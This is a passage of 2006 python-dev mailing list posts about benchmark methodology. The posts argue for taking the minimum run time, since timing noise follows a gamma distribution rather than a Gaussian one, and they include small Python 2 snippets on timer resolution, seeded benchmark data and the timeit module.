    0.472838878632
    0.473038911819
    0.473326921463
    0.473494052887
    0.473829984665

I'm pretty certain the best time is 0.4725, or very close to that. But
the average time is 0.58330151391 because of the long tail. Here are the
last 6 results in my population of 1000:

    1.76353311539
    1.79937505722
    1.82750201225
    2.01710510254
    2.44861507416
    2.90868496895

Granted, I hit a couple of web pages while doing this and my spam filter
processed my mailbox in the background...

There's probably some Markov modeling which would look at the number and
distribution of samples so far and, assuming a gamma distribution,
determine how many more samples are needed to get a good estimate of the
absolute minimum time. But min(large enough samples) should work fine.

> If the whole suite runs in 50 seconds, the per-test run-times are far
> too small to be accurate. I usually adjust the warp factor so that
> each *round* takes 50 seconds.

The stringbench.py I wrote uses the timeit algorithm, which dynamically
adjusts each test to run for between 0.2 and 2 seconds.

> That's why the timers being used by pybench will become a parameter
> that you can then select to adapt pybench to the OS you're running
> pybench on.

Wasn't that decision a consequence of the problems found during the
sprint?

Andrew
[EMAIL PROTECTED]

(attachments: plot1.png, plot2.png)
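To make that concrete, here's a toy simulation of the model: a fixed true
run time plus gamma-distributed noise (the 0.4725 base time and the gamma
parameters are invented for illustration):

    import random

    TRUE_TIME = 0.4725    # pretend noise-free run time, in seconds
    samples = [TRUE_TIME + random.gammavariate(2.0, 0.05) for i in range(1000)]

    print "minimum: %.4f" % min(samples)
    print "average: %.4f" % (sum(samples) / len(samples))
    # The minimum lands near the true time; the average is dragged up by the tail.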
Re: [Python-Dev] Python Benchmarks
On 6/2/06, Terry Reedy <[EMAIL PROTECTED]> wrote:
> Hardly a setting in which to run comparison tests, seems to me.

The point, though, was to show that the time distribution is non-Gaussian,
so intuition based on Gaussians doesn't help.

> > Using the minimum looks like the way to go for calibration.
>
> Or possibly the median.

Why? I can't think of why that's more useful than the minimum time. Given
a large number of samples, the difference between the minimum and the
median/average/whatever mostly provides information about the background
noise, which is pretty irrelevant to most benchmarks.

> But even better, the way to go to run comparison timings is to use a
> system with as little other stuff going on as possible. For Windows,
> this means rebooting in safe mode, waiting until the system is
> quiescent, and then run the timing test with *nothing* else active
> that can be avoided.

A reason I program in Python is because I want to get work done and not
deal with stoic purity. I'm not going to waste all that time (or money to
buy a new machine) just to run a benchmark. Just how much more accurate
would that be than the numbers we get now? Have you tried it? What
additional sensitivity did you get, and was the extra effort worthwhile?

> Even then, I would look at the distribution of times for a given test
> to check for anomalously high values that should be tossed. (This can
> be automated somewhat.)

I say it can be automated completely: toss all but the lowest. It's the
one with the least noise overhead.

I think fitting the smaller data points to a gamma distribution might
yield better (more reproducible and useful) numbers, but I know my stats
ability is woefully decayed so I'm not going to try. My observation is
that the shape factor is usually small, so in a few dozen to a hundred
samples there's a decent chance of getting a time with minimal noise
overhead.

Andrew
[EMAIL PROTECTED]
Re: [Python-Dev] Python Benchmarks
On 6/2/06, M.-A. Lemburg <[EMAIL PROTECTED]> wrote:
> It's interesting that even pressing a key on your keyboard
> will cause forced context switches.

When niceness was first added to multiprocessing OSes, people found their
CPU-intensive jobs would go faster by pressing enter a lot.

Andrew
[EMAIL PROTECTED]
Re: [Python-Dev] Python Benchmarks
Tim:
> A lot of things get mixed up here ;-) The _mean_ is actually useful
> if you're using a poor-resolution timer with a fast test.

In which case discrete probability distributions are better than my
assumption of a continuous distribution.

I looked at the distribution of times for 1,000 repeats of

    t1 = time.time()
    t2 = time.time()
    times.append(t2-t1)

The times and counts I found were

    9.53674316406e-07   388
    1.19209289551e-06    95
    1.90734863281e-06   312
    2.14576721191e-06   201
    2.86102294922e-06     2
    1.90734863281e-05     1
    3.00407409668e-05     1

This implies my Mac's time.time() has a resolution of 2.384185791015e-07 s
(0.2 µs, or about 4.2 MHz), or possibly a small integer fraction thereof.
The timer overhead takes between 4 and 9 ticks. Ignoring the outliers, and
assuming I have the CPU all to my benchmark for the timeslice, I expect
about +/- 3 ticks of noise per test.

To measure a 1% speedup reliably I'll need to run, what, 300-600 ticks?
That's a millisecond, and with a time quantum of 10 ms there's a 1 in 10
chance that I'll incur that overhead. In other words, I don't think my
high-resolution timer is high enough. Got a spare Cray I can use, and will
you pay for the power bill?

Andrew
[EMAIL PROTECTED]
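For anyone who wants to repeat the measurement, here is a sketch of the
tallying code (the exact deltas will of course depend on the machine and
OS):

    import time

    counts = {}
    for i in range(1000):
        t1 = time.time()
        t2 = time.time()
        delta = t2 - t1
        counts[delta] = counts.get(delta, 0) + 1

    # Print the observed deltas and how often each occurred; the spacing
    # between distinct values hints at the timer's underlying resolution.
    for delta in sorted(counts):
        print delta, counts[delta]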
Re: [Python-Dev] Python Benchmarks
On 6/3/06, [EMAIL PROTECTED] <[EMAIL PROTECTED]> wrote:
> - I would average the timings of runs instead of taking the minimum value as
> sometimes bench marks could be running code that is not deterministic in its
> calculations (could be using random numbers that effect convergence).

I would rewrite those to be deterministic. Any benchmarks of mine which
use random numbers initialize the generator with a fixed seed, and do it
in such a way that the order or choice of sub-benchmarks does not affect
the individual results. Any other way is madness.

> - Before calculating the average number I would throw out samples
> outside 3 sigmas (the outliers).

As I've insisted, talking about sigmas assumes a Gaussian distribution.
It's more likely that the timing variations (at least in stringbench) are
closer to a gamma distribution.

> Here is a passage I found ...
> ...
> Unfortunately, defining an outlier is subjective (as it should be), and the
> decisions concerning how to identify them must be made on an individual
> basis (taking into account specific experimental paradigms

The experimental paradigm I've been using is:

  - a precise and accurate clock on timescales much smaller than the
    benchmark (hence continuous distributions)
  - rare, random, short and uncorrelated interruptions

This leads to a gamma distribution (plus a constant offset for the minimum
compute time). Gamma distributions have longer tails than Gaussians and
hence more "outliers". If you think that averaging is useful, then
throwing those outliers away will artificially lower the average value.

To me, using the minimum time, given the paradigm, makes sense. How fast
is the fastest runner in the world? Do you have him run a dozen times and
take the average, or use the shortest time?

> I usually use this approach while reviewing data obtained by fairly
> accurate sensors so being being conservative using 3 sigmas works
> well for these cases.

That is a different underlying physical process, one which is better
modeled by Gaussians. Consider this: for a given benchmark there is an
absolute minimum time for it to run on a given machine. Suppose this is
10 seconds and the benchmark timing comes out 10.2 seconds. The +0.2 comes
from background overhead, though you don't know exactly what's due to
overhead and what's real. If the times were Gaussian then there would be
as much chance of getting a benchmark time of 10.5 seconds as of 9.9
seconds. But repeat the benchmark as many times as you want and you'll
never see 9.9 seconds, though you will see 10.5.

> - Another improvement to bench marks can be obtained when both
> the old and new code is available to be benched mark together.

That's what stringbench does, comparing unicode and 8-bit strings.
However, how do you benchmark changes which are more complicated than
that? For example, changes to the exception mechanism, or builds under
gcc 3.x and 4.x?

Andrew
[EMAIL PROTECTED]
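By "rewrite those to be deterministic" I mean something like this sketch:
give each sub-benchmark its own seeded generator, so neither test ordering
nor other users of the module-level random state can change its numbers
(the seed value is arbitrary):

    import random

    def benchmark_data(seed=12345, n=1000):
        # A private Random instance; random.random() calls elsewhere in
        # the suite cannot perturb this sequence, and rerunning the
        # benchmark produces exactly the same data.
        rng = random.Random(seed)
        return [rng.random() for i in range(n)]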
Re: [Python-Dev] PEP 328 and PEP 338, redux
Giovanni Bajo <[EMAIL PROTECTED]> wrote:
> Real-world usage case for import __main__? Otherwise, I say screw it :)

I have used it as a workaround for timeit.py's requirement that I pass it
strings instead of functions.

    >>> def compute():
    ...     1+1
    ...
    >>> import timeit
    >>> t = timeit.Timer("__main__.compute()", "import __main__")
    >>> t.timeit()
    1.9755008220672607
    >>>

You can argue (as many have) that timeit.py needs a better API for this.
That's a different world than the existing real one.

Andrew
[EMAIL PROTECTED]
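Spelled out as a plain script, a variation on the same trick (the function
body and the import spelling are just for illustration):

    import timeit

    def compute():
        1+1

    # timeit only accepts strings here, so the setup string reaches back
    # into the __main__ module to fetch the function being measured.
    t = timeit.Timer("compute()", "from __main__ import compute")
    print t.timeit()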